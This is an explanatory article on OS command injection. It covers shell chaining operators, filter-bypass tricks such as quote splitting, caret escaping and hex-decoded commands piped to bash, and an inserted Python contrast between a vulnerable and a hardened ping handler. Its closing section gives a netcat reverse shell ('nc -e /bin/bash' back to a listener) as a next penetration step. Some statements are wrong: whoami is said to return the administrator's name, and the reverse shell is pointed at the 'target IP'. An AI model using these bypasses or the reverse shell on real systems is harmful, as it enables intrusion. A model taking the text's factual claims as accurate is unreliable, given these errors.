Remote code/command execution vulnerabilities are referred to as RCE, short for Remote Command/Code Execution.
Remote Command Execution Vulnerability
1. Overview
Operating system command injection, usually just called command injection, is a type of injection vulnerability. For business reasons, software sometimes has to run operating system commands, for example to perform a ping. This creates the possibility of a remote command execution vulnerability: an attacker appends additional malicious instructions to the command the application already executes on the operating system, that is, injects malicious commands into the shell.
On Windows, commands are executed by cmd; on Linux, they are executed by the command-line console (the shell).
2. Detailed explanation
Cause analysis:
Some functions of an application rely on system commands to do their work. If, during development, the input passed to such command functions is not restricted at all or only weakly restricted, an attacker who controls that input can inject commands into the operating system, and a vulnerability results.
Initial probing:
The vulnerability is usually probed by entering specific command keywords or special symbols.
Ways of chaining remote commands:
- cmd1;cmd2
(Usable when command keywords and special symbols are not restricted.)
The semicolon separates the two commands.
On Linux, the second command runs after the first command has finished. On Windows (cmd), the semicolon has no such function.
The difference in behaviour therefore reveals which operating system the target is running.
- cmd1&cmd2
& is the background operator: command 1 is started and placed in the background, and command 2 is executed regardless of whether command 1 succeeds.
In other words, after &, command 1 can be anything, because command 2 will run as long as command 2 is the desired command.
- cmd1||cmd2
|| is the OR operator: command 1 is executed first, and command 2 runs only depending on its result.
If 1 succeeds, 2 is not executed; if 1 fails, 2 is executed.
- cmd1|cmd2
| is the pipe: the output of the previous command is fed to the next command as its input.
- cmd1&&cmd2
&& is the AND operator: command 1 is executed first, and command 2 runs only if command 1 succeeds.
The operators merely chain commands together to produce the malicious effect; the core is the command itself.
Prevention of remote command vulnerabilities:
Filter key characters.
Restrict the content a user is allowed to enter, and never execute the restricted content.
Bypassing filtering rules:
There are common workarounds for systems that restrict input.
1. Add quotation marks
For example, the whoami command returns the name of the system administrator, but entering it is restricted.
Adding quotation marks, as in who"am"i, bypasses the input restriction.
2. Add the ^ symbol
^ is the escape character (on Windows cmd); it turns the following character into its literal form, which breaks up the shape of the keyword.
For example, if the echo command is restricted, e^cho can be used. After escaping it is still echo, but
the input check only looks for the four characters of echo, and since e^cho is treated as five characters, echo != e^cho and the restriction is bypassed.
3. Set a variable
Enter set a=whoami (no spaces on either side of =), which assigns whoami to a.
Then enter cmd /c %a% to obtain the administrator name.
4. Use semicolons instead of spaces
Replacing spaces with semicolons only works on Windows. On Linux, the semicolon separates two commands, so Linux bypasses generally use single quotes '' or backslashes \ instead.
5. Convert text to hexadecimal
The command can be converted to hexadecimal before execution.
For example, convert echo aaa to hexadecimal.
On the Linux command line, entering echo <hexadecimal digits> | xxd -r -p | bash
converts it back into the original command and runs it, bypassing the filter.
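The prevention advice and the filter bypasses above make the same point from two sides: a keyword blacklist is fragile, while an allowlist plus an argument list that never reaches a shell is robust. As an added example (not part of the original article), here is a hypothetical Python ping handler in its vulnerable form beside a hardened version; the hostname pattern and metacharacter set are assumptions chosen for illustration.

```python
import ipaddress
import re
import subprocess

# Allowlist: an IP literal or an RFC 1123 style hostname (assumed pattern).
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

# Characters the article's bypasses rely on (; & | quotes ^ %); useful for
# detection and logging, but NOT sufficient as the only control.
SHELL_METACHARS = set(";&|`$(){}<>\n\r\"'^%")


def contains_shell_metachar(user_input: str) -> bool:
    """Blacklist-style check: flags input worth alerting on, nothing more."""
    return any(c in SHELL_METACHARS for c in user_input)


def is_valid_host(user_input: str) -> bool:
    """Allowlist validation: accept only an IP address or a plain hostname."""
    try:
        ipaddress.ip_address(user_input)
        return True
    except ValueError:
        return bool(_HOSTNAME_RE.match(user_input))


def build_ping_vulnerable(host: str) -> str:
    """Vulnerable pattern: user input concatenated into one shell string.
    Returned (not executed) so the injected shape can be inspected."""
    return "ping -c 1 " + host  # e.g. os.system(...) / shell=True in real apps


def build_ping_hardened(host: str) -> list:
    """Hardened pattern: validate first, then build an argv list (no shell)."""
    if not is_valid_host(host):
        raise ValueError("rejected host: %r" % host)
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> int:
    """Runs the hardened command; with shell=False the host is one argument,
    so even ';' or '&' inside it would never be parsed as an operator."""
    return subprocess.run(build_ping_hardened(host), check=False).returncode


if __name__ == "__main__":
    # Constructed sample input in the article's cmd1;cmd2 shape.
    print(build_ping_vulnerable("127.0.0.1;whoami"))   # shell would run both
    print(build_ping_hardened("127.0.0.1"))            # ['ping', '-c', '1', '127.0.0.1']
```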
Once the attack is possible, regarding further penetration:
1. Connect the target computer to a port on your own computer.
On your own Linux machine, listen on a port in a command-line window:
nc -lvnp 8081 (listen on 8081)
Where command-line injection is possible, enter:
cmd1&nc -e /bin/bash target IP address 8081
You can then query the target computer from the command-line window on your own computer.
For example, entering whoami displays the administrator name of the target computer.
In Docker (another Linux server), nc -e cannot be used; the bash -i command can be used instead.